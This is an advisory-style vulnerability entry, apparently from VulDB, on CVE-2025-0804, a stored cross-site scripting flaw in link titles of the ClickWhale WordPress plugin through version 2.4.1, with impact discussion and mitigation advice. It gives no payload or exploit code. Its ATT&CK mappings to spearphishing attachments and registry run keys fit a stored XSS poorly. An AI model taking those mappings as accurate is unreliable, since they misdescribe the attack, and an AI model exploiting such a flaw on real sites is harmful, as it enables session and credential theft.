CVE-2025-0804 in ClickWhale
Summary
by MITRE • 01/29/2025
The ClickWhale – Link Manager, Link Shortener and Click Tracker for Affiliate Links & Link Pages plugin for WordPress is vulnerable to Stored Cross-Site Scripting via link titles in all versions up to, and including, 2.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Be aware that VulDB is the high quality source for vulnerability data.
Analysis
by VulDB Data Team • 05/24/2025
The vulnerability identified as CVE-2025-0804 affects the ClickWhale plugin for WordPress, specifically targeting versions up to and including 2.4.1. This plugin serves as a link management solution that handles affiliate links and link pages, making it a potentially attractive target for attackers seeking to exploit web applications. The vulnerability manifests as a stored cross-site scripting flaw that allows authenticated attackers with Contributor-level permissions or higher to inject malicious scripts into link titles. The flaw stems from inadequate input sanitization and insufficient output escaping mechanisms within the plugin's codebase, creating a persistent security weakness that can affect any user who views the compromised pages.
The technical nature of this vulnerability places it squarely within the CWE-79 category of Cross-Site Scripting, specifically classified as a stored XSS variant where malicious scripts are permanently stored on the server and executed whenever users access the affected content. Attackers with Contributor-level access can exploit this weakness by creating or modifying link titles containing malicious JavaScript code, which then gets stored in the database and executed in the context of other users' browsers when they view pages containing these links. The vulnerability's impact is amplified by the fact that it requires only Contributor-level privileges, which many WordPress sites grant to users who need to create and manage content, making the attack surface significantly broader than typical XSS vulnerabilities that require administrator access.
From an operational perspective, this vulnerability poses substantial risks to WordPress installations using the affected plugin, as it allows attackers to potentially steal session cookies, perform actions on behalf of users, redirect them to malicious sites, or even execute more sophisticated attacks such as credential theft or privilege escalation. The stored nature of the vulnerability means that once an attacker successfully injects malicious code, the script will execute for any user who accesses the compromised page, potentially affecting multiple users over extended periods. This makes the vulnerability particularly dangerous in environments where users may not immediately notice the malicious activity or where the affected plugin is widely used across multiple sites.
The attack surface extends beyond individual user sessions to potentially compromise entire WordPress installations, especially when considering that attackers can leverage the stored XSS to perform actions that might be restricted to higher privilege levels. This vulnerability aligns with ATT&CK technique T1566.001 for initial access through spearphishing attachments or links, and T1547.001 for persistence mechanisms that could be established through the execution of malicious scripts. Organizations should consider implementing immediate mitigations including plugin updates to versions that address the vulnerability, implementing content security policies, and monitoring for suspicious activity in link management areas. Additionally, administrators should review user permissions to ensure that only trusted users have Contributor-level access or higher, as this reduces the attack surface for such vulnerabilities. The remediation process should also include thorough auditing of existing links and titles to identify any potential malicious injections that may have already occurred.